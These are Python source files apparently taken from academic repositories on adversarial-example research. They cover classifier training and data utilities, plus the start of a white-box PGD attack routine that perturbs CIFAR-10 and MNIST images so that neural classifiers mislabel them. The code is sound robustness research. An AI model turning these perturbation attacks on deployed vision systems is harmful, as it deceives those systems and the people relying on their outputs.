"""Initialize the Resnet block
A resnet block is a conv block with skip connections
We construct a conv block with build_conv_block function,
and implement skip connections in <forward> function.
Original Resnet paper: https://arxiv.org/pdf/1512.03385.pdf
"""
super(ResnetBlock, self).__init__()
self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias)
def build_conv_block(self, dim, padding_type, norm_layer, use_dropout, use_bias):
"""Construct a convolutional block.
Parameters:
dim (int) -- the number of channels in the conv layer.
padding_type (str) -- the name of padding layer: reflect | replicate | zero
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers.
use_bias (bool) -- if the conv layer uses bias or not
Returns a conv block (with a conv layer, a normalization layer, and a non-linearity layer (ReLU))
"""
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim), nn.ReLU(True)]
if use_dropout:
conv_block += [nn.Dropout(0.5)]
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim)]
return nn.Sequential(*conv_block)
def forward(self, x):
"""Forward function (with skip connections)"""
out = x + self.conv_block(x) # add skip connections
return out
```
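A minimal CPU smoke test for the `MnistGenerator` defined above; the import path follows the file header, and the module's own dependencies (e.g. `flows`, `ipdb`) are assumed to be installed. The shapes and the 1-element epsilon tensor match the `forward` signature; everything else is illustrative:
```python
import torch

from models.generators import MnistGenerator  # path per the file header above

G = MnistGenerator(norm="Linf")
x = torch.rand(8, 1, 28, 28)          # a batch of MNIST-shaped inputs in [0, 1]
eps = torch.tensor([0.3])             # epsilon is passed as a 1-element tensor
x_adv, ent = G(x, eps)                # perturbed batch and the sampling entropy
print(x_adv.shape, float(ent))        # torch.Size([8, 1, 28, 28]) ...
assert (x_adv - x).abs().max() <= eps.item() + 1e-6   # Linf budget is respected
```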
#### File: Adversarial-Example-Games/models/spectral_normalization.py
```python
import torch
from torch.optim.optimizer import Optimizer, required
from torch.autograd import Variable
import torch.nn.functional as F
from torch import nn
from torch import Tensor
from torch.nn import Parameter
def l2normalize(v, eps=1e-12):
return v / (v.norm() + eps)
class SpectralNorm(nn.Module):
def __init__(self, module, name='weight', power_iterations=1):
super(SpectralNorm, self).__init__()
self.module = module
self.name = name
self.power_iterations = power_iterations
if not self._made_params():
self._make_params()
def _update_u_v(self):
u = getattr(self.module, self.name + "_u")
v = getattr(self.module, self.name + "_v")
w = getattr(self.module, self.name + "_bar")
height = w.data.shape[0]
for _ in range(self.power_iterations):
v.data = l2normalize(torch.mv(torch.t(w.view(height,-1).data), u.data))
u.data = l2normalize(torch.mv(w.view(height,-1).data, v.data))
# sigma = torch.dot(u.data, torch.mv(w.view(height,-1).data, v.data))
sigma = u.dot(w.view(height, -1).mv(v))
setattr(self.module, self.name, w / sigma.expand_as(w))
def _made_params(self):
try:
u = getattr(self.module, self.name + "_u")
v = getattr(self.module, self.name + "_v")
w = getattr(self.module, self.name + "_bar")
return True
except AttributeError:
return False
def _make_params(self):
w = getattr(self.module, self.name)
height = w.data.shape[0]
width = w.view(height, -1).data.shape[1]
u = Parameter(w.data.new(height).normal_(0, 1), requires_grad=False)
v = Parameter(w.data.new(width).normal_(0, 1), requires_grad=False)
u.data = l2normalize(u.data)
v.data = l2normalize(v.data)
w_bar = Parameter(w.data)
del self.module._parameters[self.name]
self.module.register_parameter(self.name + "_u", u)
self.module.register_parameter(self.name + "_v", v)
self.module.register_parameter(self.name + "_bar", w_bar)
def forward(self, *args):
self._update_u_v()
return self.module.forward(*args)
```
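A short usage sketch for the `SpectralNorm` wrapper above: each forward call runs one power iteration to re-estimate the largest singular value of the wrapped layer's weight and divides the weight by it. The import path is taken from the file header:
```python
import torch
from torch import nn

from models.spectral_normalization import SpectralNorm  # path per the file header above

conv = SpectralNorm(nn.Conv2d(3, 64, kernel_size=3, padding=1))
x = torch.randn(2, 3, 32, 32)
y = conv(x)        # one power iteration, then the spectrally normalized convolution
print(y.shape)     # torch.Size([2, 64, 32, 32])
```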
#### File: Adversarial-Example-Games/utils/dataset_split.py
```python
from torchvision import datasets, transforms
import torch
import os
import argparse
import ipdb
from numpy.random import default_rng
from torch._utils import _accumulate
from torch.utils.data import Subset
default_generator = default_rng()
def random_split(dataset, lengths, generator=default_generator):
"""
Randomly split a dataset into non-overlapping new datasets of given lengths.
Optionally fix the generator for reproducible results, e.g.:
>>> random_split(range(10), [3, 7], generator=default_rng(42))
Arguments:
dataset (Dataset): Dataset to be split
lengths (sequence): lengths of splits to be produced
generator (numpy.random.Generator): generator used for the random permutation.
"""
if sum(lengths) != len(dataset):
raise ValueError("Sum of input lengths does not equal the length of the input dataset!")
indices = generator.permutation(sum(lengths)).tolist()
return [Subset(dataset, indices[offset - length : offset]) for offset, length in zip(_accumulate(lengths), lengths)]
def create_dataset_split(args, root='./data', num_splits=7,
train_split=0.8, generator=default_generator,
partition="train_and_test", augment=False, transform=None,
normalize=None):
if args.dataset == "mnist":
name = "MNIST"
else:
name = "cifar-split"
path_to_split = os.path.join(root, "%s/split_%i/data.pt"%(name,num_splits))
if os.path.exists(path_to_split):
print("Loading %i splits of the %s dataset..."%(num_splits, args.dataset))
list_split_dataset = torch.load(path_to_split)
else:
print("Split_%i dataset for %s does not exist. Creating a %i split of the dataset..."%(num_splits, args.dataset, num_splits))
if args.dataset == "mnist":
test_transforms = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
if augment:
mnist_transforms = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
elif transform is not None:
mnist_transforms = transform
else:
mnist_transforms = transforms.Compose([
transforms.ToTensor(),
])
trainset = datasets.MNIST(root=root, train=True, download=True,
transform=mnist_transforms)
testset = datasets.MNIST(root=root, train=False, transform=mnist_transforms)
elif args.dataset == "cifar":
if augment:
transform_train = [
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor()]
else:
transform_train = [transforms.ToTensor()]
transform_test = [transforms.ToTensor()]
if normalize is not None:
transform_train.append(normalize)
transform_test.append(normalize)
transform_train = transforms.Compose(transform_train)
transform_test = transforms.Compose(transform_test)
trainset = datasets.CIFAR10(root=root, train=True,
download=True, transform=transform_train)
testset = datasets.CIFAR10(root=root, train=False,
download=True, transform=transform_test)
else:
raise ValueError()
if partition == "train_and_test":
dataset = torch.utils.data.ConcatDataset([trainset, testset])
elif partition == "train":
dataset = trainset
elif partition == "test":
dataset = testset
else:
raise ValueError()
list_splits = [len(dataset)//num_splits]*num_splits + [len(dataset)%num_splits]
split_dataset = random_split(dataset, list_splits, generator=generator)[:-1]
#split_dataset = torch.utils.data.random_split(dataset, list_splits)[:-1]
list_split_dataset = []
for dataset in split_dataset:
train_size = int(len(dataset)*train_split)
list_splits = [train_size, len(dataset)-train_size]
split = random_split(dataset, list_splits, generator=generator)
#split = torch.utils.data.random_split(dataset, list_splits)
list_split_dataset.append({"train": split[0], "test": split[1]})
dirname = os.path.dirname(path_to_split)
if not os.path.exists(dirname):
os.makedirs(dirname)
torch.save(list_split_dataset, path_to_split)
return list_split_dataset
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--path_to_dataset', default="./data", type=str)
parser.add_argument('--dataset', default="mnist", choices=("mnist", "cifar"))
parser.add_argument('--seed', default=1234, type=int)
parser.add_argument('--num_splits', default=7, type=int)
args = parser.parse_args()
generator = default_rng(args.seed)
split_dataset = create_dataset_split(args, root=args.path_to_dataset, num_splits=args.num_splits,
generator=generator, augment=False)
print(len(split_dataset))
print(split_dataset[0])
print(len(split_dataset[0]["train"]))
```
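A quick sanity check for the `random_split` helper above, using a seeded NumPy generator as the function expects (the import path follows the file header; the module also pulls in `torchvision` and `ipdb`):
```python
from numpy.random import default_rng

from utils.dataset_split import random_split  # path per the file header above

splits = random_split(list(range(10)), [3, 7], generator=default_rng(42))
print([len(s) for s in splits])                        # -> [3, 7]
print(sorted(splits[0].indices + splits[1].indices))   # a permutation of 0..9
```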
#### File: Adversarial-Example-Games/utils/utils.py
```python
import os
import wandb
import sys
import torch
import torchvision
from torch import nn, optim
import torchvision.transforms as transforms
from torchvision import datasets
from torchvision.models import resnet50
import torchvision.utils as vutils
from torchvision.utils import save_image
import torch.nn.functional as F
import matplotlib.pyplot as plt
import torchvision.models as models
from random import randint
from PIL import Image
from cnn_models import *
from cnn_models import LeNet as Net
from cnn_models.mnist_ensemble_adv_train_models import *
from models.dcgan28 import DiscriminatorCNN28
import ipdb
import numpy as np
import random
import utils.config as cf
from utils.sls import Sls
from torch.utils.data import Subset, ConcatDataset
from utils.dataset_split import create_dataset_split
CIFAR_NORMALIZATION = transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
''' Set Random Seed '''
def seed_everything(seed):
if seed:
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
def project_name(dataset_name):
if dataset_name:
return "NoBox-{}".format(dataset_name)
else:
return "NoBox"
def reduce_sum(x, keepdim=True):
for a in reversed(range(1, x.dim())):
x = x.sum(a, keepdim=keepdim)
return x.squeeze().sum()
def L2_dist(x, y):
return torch.mean(torch.norm(x - y,p=2,dim=(1,2,3)))
def L2_norm_dist(x, y):
dist = torch.norm(x - y, p=2,dim=(1,2,3))
return dist
def Linf_dist(x, y):
dist = torch.norm(x - y, float('inf'),dim=(1,2,3))
return dist
class Normalize(nn.Module):
"""
Normalize an image as part of a torch nn.Module
"""
def __init__(self, mean, std):
super(Normalize, self).__init__()
self.mean = torch.Tensor(mean)
self.std = torch.Tensor(std)
def forward(self, x):
num = (x - self.mean.type_as(x)[None,:,None,None])
denom = self.std.type_as(x)[None,:,None,None]
return num / denom
def to_cuda(model):
cuda_stat = torch.cuda.is_available()
if cuda_stat:
model = torch.nn.DataParallel(model,\
device_ids=range(torch.cuda.device_count())).cuda()
return model
def tensor_to_cuda(x):
cuda_stat = torch.cuda.is_available()
if cuda_stat:
x = x.cuda()
return x
def display_tensor(tensor):
plt.imshow((tensor)[0].detach().numpy().transpose(1,2,0))
plt.show()
def save_image_to_wandb(args,image,name,normalize):
batch_size,nc,h,w = image.shape
image, image_reshaped = to_img(image.cpu().data,nc,h,w)
save_image(image, name, normalize=normalize)
return image_reshaped.detach().cpu().numpy()
def load_imagenet_classes():
with open("references/adver_robust/introduction/imagenet_class_index.json") as f:
imagenet_classes = {int(i):x[1] for i,x in json.load(f).items()}
return imagenet_classes
def get_single_data(args):
"""
Data loader. For now, just a test sample
"""
assert args.split is None
if args.dataset == 'mnist':
trainloader, testloader = load_mnist(args, augment=False)
tensor,target = trainloader.dataset[randint(1,\
100)]
tensor = tensor_to_cuda(tensor.unsqueeze(0))
target = tensor_to_cuda(target.unsqueeze(0))
args.classes = 10
elif args.dataset=='cifar':
trainloader, testloader = load_cifar(args,augment=True)
tensor,target = trainloader.dataset[randint(1,\
100)]
tensor = tensor_to_cuda(tensor.unsqueeze(0))
target = tensor_to_cuda(target.unsqueeze(0))
args.classes = 10
else:
pig_img = Image.open("references/adver_robust/introduction/pig.jpg")
preprocess = transforms.Compose([
transforms.Resize(224),
transforms.ToTensor(),
])
tensor = tensor_to_cuda(preprocess(pig_img)[None,:,:,:])
source_class = 341 # pig class
target = tensor_to_cuda(torch.LongTensor([source_class]))
args.classes = 1000
# Get flat input size
args.input_size = tensor[0][0].flatten().shape[0]
return tensor, target
def create_loaders(args, augment=True, normalize=None, root='./data', num_test_samples=None, split=None):
"""
Data loader. For now, just a test sample
"""
if args.dataset == 'mnist':
# Normalize image for MNIST
# normalize = Normalize(mean=(0.1307,), std=(0.3081,))
normalize = None
if args.split is None:
trainloader, testloader = load_mnist(args, augment=False,
root=root, num_test_samples=args.num_test_samples)
else:
trainloader, testloader, s_train_loader, s_test_loader = load_mnist(args, augment=False,
root=root, num_test_samples=args.num_test_samples,
split=split)
args.classes = 10
args.input_size = 784
args.nc, args.h, args.w = 1,28,28
args.clip_min = 0.
args.clip_max = 1.
elif args.dataset=='cifar':
#normalize=Normalize(mean=[0.5,0.5,0.5],std=[0.5,0.5,0.5])
args.input_size = 32*32*3
if args.split is None:
trainloader, testloader = load_cifar(args, augment=False,
normalize=normalize, root=root,
num_test_samples=num_test_samples)
else:
trainloader, testloader, s_train_loader, s_test_loader = load_cifar(args, augment=False,
normalize=normalize, root=root,
num_test_samples=num_test_samples, split=split)
args.classes = 10
args.nc, args.h, args.w = 3,32,32
args.clip_min = -1.
args.clip_max = 1.
else:
# Normalize image for ImageNet
# normalize=utils.Normalize(mean=[0.485,0.456,0.406],std=[0.229,0.224,0.225])
# args.input_size = 150528
raise NotImplementedError
if split is None:
return trainloader, testloader, None, None
else:
return trainloader, testloader, s_train_loader, s_test_loader
def load_unk_model(args, filename=None, madry_model=False, name="VGG16"):
"""
Load an unknown model. Used for convenience to easily swap unk model
"""
# First, check if target model is specified in args
if args.train_with_critic_path is not None:
path = args.train_with_critic_path
if not os.path.isdir(path):
msg = "You passed arg `train_with_critic_path` with path "
msg += path + " which is not a valid dir"
sys.exit(msg)
if "madry" in path:
try:
model = args.madry_model[path]
except:
from classifiers.madry_challenge.madry_et_al_utils import get_madry_et_al_tf_model
model = get_madry_et_al_tf_model(args.dataset, path)
# Hack for now, we cannot load this model twice (tensorflow), so
# store pointer
args.madry_model = {path: model}
elif args.dataset == 'mnist':
# First case is to laod the Madry model
if (
(filename is None) and (args.attack_type == 'nobox') and (args.fixed_critic)
):
# Super hacky, check if Madry model already loaded
print('loading Madry model')
try:
model = args.madry_model
except:
from classifiers.madry_challenge.madry_et_al_utils import get_madry_et_al_tf_model
path = os.path.join(args.dir_test_models, "madry_challenge_models", args.dataset, "adv_trained")
model = get_madry_et_al_tf_model(args.dataset, path)
# Hack for now, we cannot load this model twice (tensorflow), so
# store pointer
args.madry_model = model
# Generic classifier
elif (filename is None) and (args.attack_type == 'nobox') or (args.source_arch == 'ens_adv'):
print('Loading generic classifier')
if args.source_arch == 'ens_adv' or args.ensemble_adv_trained:
model = model_mnist(type=args.type)
# model = load_model(args, args.model_name, type=args.type)
else:
model = MadryLeNet(args.nc, args.h, args.w).to(args.dev)
elif name == 'PGD Adversarial Training':
from classifiers.madry_challenge.madry_et_al_utils import get_madry_et_al_tf_model
model = get_madry_et_al_tf_model(args.dataset, filename)
else:
if filename is None:
filename = "saved_models/mnist_cnn.pt"
if os.path.exists(filename):
# very hacky: this fails if the architecture is not the correct one
try:
model = Net(args.nc, args.h, args.w).to(args.dev)
model.load_state_dict(torch.load(filename))
model.eval()
except:
model = MadryLeNet(args.nc, args.h, args.w).to(args.dev)
model.load_state_dict(torch.load(filename))
model.eval()
else:
print("training a model from scratch")
model = main_mnist(args, filename=filename)
elif args.dataset == 'cifar':
if name == 'PGD Adversarial Training':
from classifiers.madry_challenge.madry_et_al_utils import get_madry_et_al_tf_model
model = get_madry_et_al_tf_model(args.dataset, filename)
else:
init_func, _ = ARCHITECTURES[name]
if (filename is None) and (args.attack_type == 'nobox'):
model = init_func().to(args.dev)
else:
if (filename is None) or (not os.path.exists(filename)):
model = train_cifar(args, name=name)  # train just the requested architecture
else:
# model = DenseNet121().to(args.dev)
model = init_func().to(args.dev)
model = nn.DataParallel(model)
#print(filename, model, init_func, name)
model.load_state_dict(torch.load(filename))
model.eval()
else:
# load pre-trained ResNet50
model = resnet50(pretrained=True).to(args.dev)
model = nn.DataParallel(model)
return model
def main_mnist(args, filename, lr=1e-3, num_epochs=11, logger=None, split=None):
if filename is None:
filename = os.path.join('./saved_models/', "mnist_cnn.pt")  # default checkpoint path (matches the default in load_unk_model)
train_loader, test_loader = create_loaders(args, augment=False, split=split)
model = Net(args.nc, args.h, args.w).to(args.dev)
optimizer = optim.Adam(model.parameters(), lr=lr)
for epoch in range(1, num_epochs):
train_classifier(args, model, args.dev, train_loader, optimizer, epoch, logger)
test_classifier(args, model, args.dev, test_loader, epoch, logger)
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
torch.save(model.state_dict(), filename)
return model
ARCHITECTURES = {
'VGG16': (VGG, 50),
'res18': (resnet.ResNet18, 500),
'dense121': (densenet.densenet_cifar, 500),
'googlenet': (googlenet.GoogLeNet, 500),
'lenet': (LeNet, 250),
'wide_resnet': (wide_resnet.Wide_ResNet, None),
'VGG16_ens': (VGG, 50),
'res18_ens': (resnet.ResNet18, 500),
'dense121_ens': (densenet.densenet_cifar, 500),
'googlenet_ens': (googlenet.GoogLeNet, 500),
'wide_resnet_ens': (wide_resnet.Wide_ResNet, None)
}
def train_cifar(args, name="VGG16", augment=True, normalize=None,
filename=None, lr=1e-4, num_epochs=100, logger=None, optimizer="adam",
i =0):
if filename is None:
filename = os.path.join('./pretrained_classifiers/cifar/', "%s/" %
name, 'model_%s.pt' % i)
init_func, _ = ARCHITECTURES[name]
print("Training %s" % (name))
model = init_func().to(args.dev)
if name == "wide_resnet":
model.apply(wide_resnet.conv_init)
model = nn.DataParallel(model)
train_loader, test_loader, split_train_loader, split_test_loader = create_loaders(args,
split=args.split, augment=augment, normalize=normalize)
if args.split is not None:
train_loader = split_train_loader
test_loader = split_test_loader
if optimizer == "adam":
_optimizer = optim.Adam(model.parameters(), lr=lr)
elif optimizer == "sgd":
_optimizer = optim.SGD(model.parameters(), lr=cf.learning_rate(lr, num_epochs), momentum=0.9, weight_decay=5e-4)
elif optimizer == "sls":
n_batches_per_epoch = len(train_loader)  # number of batches per epoch for the Sls line-search optimizer
_optimizer = Sls(model.parameters(), n_batches_per_epoch=n_batches_per_epoch)
else:
raise ValueError("Only supports adam or sgd for optimizer.")
best_acc = 0
for epoch in range(1, num_epochs):
if optimizer == "sgd":
_optimizer = optim.SGD(model.parameters(), lr=cf.learning_rate(lr, num_epochs), momentum=0.9, weight_decay=5e-4)
train_classifier(args, model, args.dev, train_loader, _optimizer, epoch, logger=logger)
acc = test_classifier(args, model, args.dev, test_loader, epoch, logger=logger)
if acc > best_acc:
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
torch.save(model.state_dict(), filename)
best_acc = acc
return model
def main_cifar(args, augment=True):
for name in ARCHITECTURES:
model = train_cifar(args, name=name, augment=augment)
return model
def train_classifier(args, model, device, train_loader, optimizer, epoch, logger=None):
model.train()
criterion = nn.CrossEntropyLoss(reduction="mean")
train_loss = 0
correct = 0
total = 0
early_stop_param = 0.01
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = criterion(output, target)
if isinstance(optimizer, Sls):
def closure():
output = model(data)
loss = criterion(output, target)
return loss
optimizer.step(closure)
else:
loss.backward()
optimizer.step()
train_loss += loss.item()
running_loss = loss.item()
_, predicted = output.max(1)
total += target.size(0)
correct += predicted.eq(target).sum().item()
if batch_idx % 10 == 0:
print(f'Train Epoch: {epoch:d} [{batch_idx * len(data):d}/{len(train_loader.dataset):d} '
f'({100. * batch_idx / len(train_loader):.0f}%)]\tLoss: {loss.item():.6f} | '
f'Acc: {100. * correct / total:.3f}%')
if running_loss < early_stop_param:
print("Early Stopping !!!!!!!!!!")
break
running_loss = 0.0
if logger is not None:
logger.write(dict(train_accuracy=100. * correct / total, loss=loss.item()), epoch)
def test_classifier(args, model, device, test_loader, epoch, logger=None):
model.eval()
test_loss = 0
correct = 0
criterion = nn.CrossEntropyLoss()
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
loss = criterion(output, target)
# sum up batch loss
test_loss += loss.item()
# get the index of the max log-probability
pred = output.max(1, keepdim=True)[1]
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
acc = 100. * correct / len(test_loader.dataset)
if logger is None:
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'\
.format(test_loss, correct, len(test_loader.dataset), acc))
else:
logger.write(dict(test_loss=test_loss, test_accuracy=acc), epoch)
return acc
def load_cifar(args, augment=False, normalize=None, root='./data', num_test_samples=None, split=None):
"""
Load and normalize the training and test data for CIFAR10
"""
torch.multiprocessing.set_sharing_strategy('file_system')
print('==> Preparing data..')
if augment:
transform_train = [
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor()]
else:
transform_train = [transforms.ToTensor()]
transform_test = [transforms.ToTensor()]
if normalize is not None:
transform_train.append(normalize)
transform_test.append(normalize)
transform_train = transforms.Compose(transform_train)
transform_test = transforms.Compose(transform_test)
if split is None:
train_set = torchvision.datasets.CIFAR10(root=root, train=True,
download=True, transform=transform_train)
test_set = torchvision.datasets.CIFAR10(root=root, train=False,
download=True, transform=transform_test)
else:
dataset_split = create_dataset_split(args, root=root, num_splits=6, augment=augment)
assert split < len(dataset_split)
train_splits, test_splits = [], []
for i in range(0,len(dataset_split)):
dataset = dataset_split[i]
train_set, test_set = dataset["train"], dataset["test"]
train_splits.append(train_set)
test_splits.append(test_set)
split_train_dataset = ConcatDataset(train_splits)
split_test_dataset = ConcatDataset(test_splits)
if num_test_samples is not None:
generator = None
indices = torch.randint(len(split_test_dataset), size=(num_test_samples,), generator=generator)
if args.fixed_testset is True:
generator = torch.random.manual_seed(1234)
indices = torch.arange(num_test_samples)
split_test_dataset = Subset(split_test_dataset, indices)
split_train_loader = torch.utils.data.DataLoader(split_train_dataset,
batch_size=args.batch_size, shuffle=True, pin_memory=True)
split_test_loader = torch.utils.data.DataLoader(split_test_dataset,
batch_size=args.batch_size, shuffle=False, pin_memory=True)
dataset = dataset_split[split]
train_set, test_set = dataset["train"], dataset["test"]
if num_test_samples is not None:
generator = None
indices = torch.randint(len(test_set), size=(num_test_samples,), generator=generator)
if args.fixed_testset is True:
generator = torch.random.manual_seed(1234)
indices = torch.arange(num_test_samples)
test_set = Subset(test_set, indices)
# if args.train_set == 'test':
# train_set = test_set
# elif args.train_set == 'train_and_test':
# train_set = torch.utils.data.ConcatDataset([train_set,test_set])
trainloader = torch.utils.data.DataLoader(train_set,batch_size=args.batch_size,
shuffle=True, num_workers=0,
pin_memory=True)
testloader = torch.utils.data.DataLoader(test_set,batch_size=args.test_batch_size,
shuffle=False, num_workers=0,
pin_memory=True)
if split is None:
return trainloader, testloader
else:
return trainloader, testloader, split_train_loader, split_test_loader
return trainloader, testloader
def load_mnist(args, augment=True, root='./data', num_test_samples=None, split=None):
"""
Load and normalize the training and test data for MNIST
"""
print('==> Preparing data..')
test_transforms = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
if augment:
mnist_transforms = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
else:
mnist_transforms = transforms.Compose([
transforms.ToTensor(),
])
if split is None:
train_set = datasets.MNIST(root=root, train=True, download=True,
transform=mnist_transforms)
test_set = datasets.MNIST(root=root, train=False, transform=mnist_transforms)
else:
dataset_split = create_dataset_split(args, root=root, num_splits=7,
transform=mnist_transforms, augment=augment)
assert split < len(dataset_split)
train_splits, test_splits = [], []
for i in range(0,7):
dataset = dataset_split[i]
train_set, test_set = dataset["train"], dataset["test"]
train_splits.append(train_set)
test_splits.append(test_set)
split_train_dataset = ConcatDataset(train_splits)
split_test_dataset = ConcatDataset(test_splits)
if num_test_samples is not None:
generator = None
indices = torch.randint(len(split_test_dataset), size=(num_test_samples,), generator=generator)
if args.fixed_testset is True:
generator = torch.random.manual_seed(1234)
indices = torch.arange(num_test_samples)
split_test_dataset = Subset(split_test_dataset, indices)
split_train_loader = torch.utils.data.DataLoader(split_train_dataset,
batch_size=args.batch_size, shuffle=True)
split_test_loader = torch.utils.data.DataLoader(split_test_dataset,
batch_size=args.batch_size, shuffle=False)
dataset = dataset_split[split]
train_set, test_set = dataset["train"], dataset["test"]
if num_test_samples is not None:
generator = None
indices = torch.randint(len(test_set), size=(num_test_samples,), generator=generator)
if args.fixed_testset is True:
generator = torch.random.manual_seed(1234)
indices = torch.arange(num_test_samples)
test_set = Subset(test_set, indices)
# if args.train_set == 'test':
# train_set = test_set
# elif args.train_set == 'train_and_test':
# train_set = torch.utils.data.ConcatDataset([train_set, test_set])
trainloader = torch.utils.data.DataLoader(train_set,
batch_size=args.batch_size, shuffle=True)
testloader = torch.utils.data.DataLoader(test_set,
batch_size=args.batch_size, shuffle=False)
if split is None:
return trainloader, testloader
else:
return trainloader, testloader, split_train_loader, split_test_loader
def to_img(x,nc,h,w):
# x = x.clamp(0, 1)
x = x.view(x.size(0), nc, h, w)
x_reshaped = x.permute(0,2,3,1)
return x, x_reshaped
def freeze_model(model):
model.eval()
for params in model.parameters():
params.requires_grad = False
return model
def nobox_wandb(args, epoch, x, target, adv_inputs, adv_out, adv_correct,
clean_correct, loss_misclassify, loss_model, loss_perturb,
loss_gen, train_loader):
n_imgs = min(30, len(x))
clean_image = (x)[:n_imgs].detach()
adver_image = (adv_inputs)[:n_imgs].detach()
if args.dataset == 'cifar':
factor = 10.
else:
factor = 1.
delta_image = factor*(adver_image - clean_image)
file_base = "adv_images/train/" + args.namestr + "/"
if not os.path.exists(file_base):
os.makedirs(file_base)
# import pdb; pdb.set_trace()
img2log_clean = save_image_to_wandb(args, clean_image, file_base + "clean.png", normalize=True)
img2log_adver = save_image_to_wandb(args, adver_image, file_base + "adver.png", normalize=True)
img2log_delta = save_image_to_wandb(args, delta_image, file_base + "delta.png", normalize=True)
adv_acc = 100. * adv_correct.cpu().numpy() / len(train_loader.dataset)
clean_acc = 100. * clean_correct.cpu().numpy() / len(train_loader.dataset)
wandb.log({"Adv. Train Accuracy": adv_acc,
"Clean Train Accuracy": clean_acc,
"Misclassification Loss": loss_misclassify.item(),
"Critic Loss": loss_model.item(),
"Perturb Loss": loss_perturb.item(), "x": epoch,
'Gen Loss': loss_gen.item(),
'Train_Clean_image': [wandb.Image(img, caption="Train Clean") for img in img2log_clean],
'Train_Adver_image': [wandb.Image(img, caption="Train Adv, "f"Label: {target[i]}"
f" Predicted: {adv_out[i].item()}")
for i, img in enumerate(img2log_adver)],
'Train_Delta_image': [wandb.Image(img, caption="Train Delta") for img in img2log_delta]
})
def concat_dataset(args, loader_1, loader_2):
dataset_1 = loader_1.dataset
dataset_2 = loader_2.dataset
dataset_tot = torch.utils.data.ConcatDataset([dataset_1, dataset_2])
return torch.utils.data.DataLoader(dataset_tot,
batch_size=args.batch_size, shuffle=True)
kwargs_perturb_loss = {'Linf': Linf_dist, 'L2': L2_dist}
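# Usage note: kwargs_perturb_loss lets callers pick the perturbation-distance
# function by norm name, e.g. dist_fn = kwargs_perturb_loss['Linf']; d = dist_fn(x_adv, x).
# Note the asymmetry: L2_dist returns a batch mean, while Linf_dist returns
# per-sample distances.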
``` |
{
"source": "joeybose/BlackMagicDesign",
"score": 2
} |
#### File: joeybose/BlackMagicDesign/attacks.py
```python
from PIL import Image
from torchvision import transforms
import torch
from models import *
from torch import nn, optim
from torchvision.models import resnet50
from torchvision.models.vgg import VGG
import torchvision.models.densenet as densenet
import torchvision.models.alexnet as alexnet
from torchvision.utils import save_image
import torch.nn.functional as F
from advertorch.utils import batch_multiply
from advertorch.utils import batch_clamp
from advertorch.utils import clamp
from torch import optim
from torch.autograd import Variable
import json
import os
import numpy as np
import argparse
from tqdm import tqdm
from utils import *
import ipdb
from advertorch.attacks import LinfPGDAttack, L2PGDAttack
def whitebox_pgd(args, model):
adversary = L2PGDAttack(
model, loss_fn=nn.CrossEntropyLoss(reduction="sum"), eps=0.3,
nb_iter=40, eps_iter=0.01, rand_init=True, clip_min=-1.0, clip_max=1.0,
targeted=False)
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True,
download=True, transform=transform_train)
train_loader = torch.utils.data.DataLoader(trainset,batch_size=1,
shuffle=True, num_workers=8)
train_itr = tqdm(enumerate(train_loader),total=len(train_loader.dataset))
correct = 0
for batch_idx, (data, target) in train_itr:
x, target = data.to(args.device), target.to(args.device)
adv_image = adversary.perturb(x, target)
pred = model(adv_image)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += out.eq(target.unsqueeze(1).data).sum()
acc = 100. * correct.cpu().numpy() / len(train_loader.dataset)
print("Model accuracy under PGD attack: %f" % (acc))
def white_box_untargeted(args, image, target, model, enc=None, dec=None, \
vae=None, ae= None, normalize=None):
epsilon = 0.3
# Create noise vector
delta = torch.zeros_like(image,requires_grad=True).to(args.device)
# Optimize noise vector (only) to fool model
x = image
use_vae = True if (vae is not None) else False
use_ae = True if (ae is not None) else False
print("Target is %d" %(target))
for t in range(args.PGD_steps):
if normalize is not None:
if use_vae:
x = x.view(x.size(0), -1).unsqueeze(0)
z, mu, logvar = vae(x)
z = z.clamp(0, 1)
x = z.view(z.size(0), 1, 28, 28)
elif use_ae:
x = ae(x)
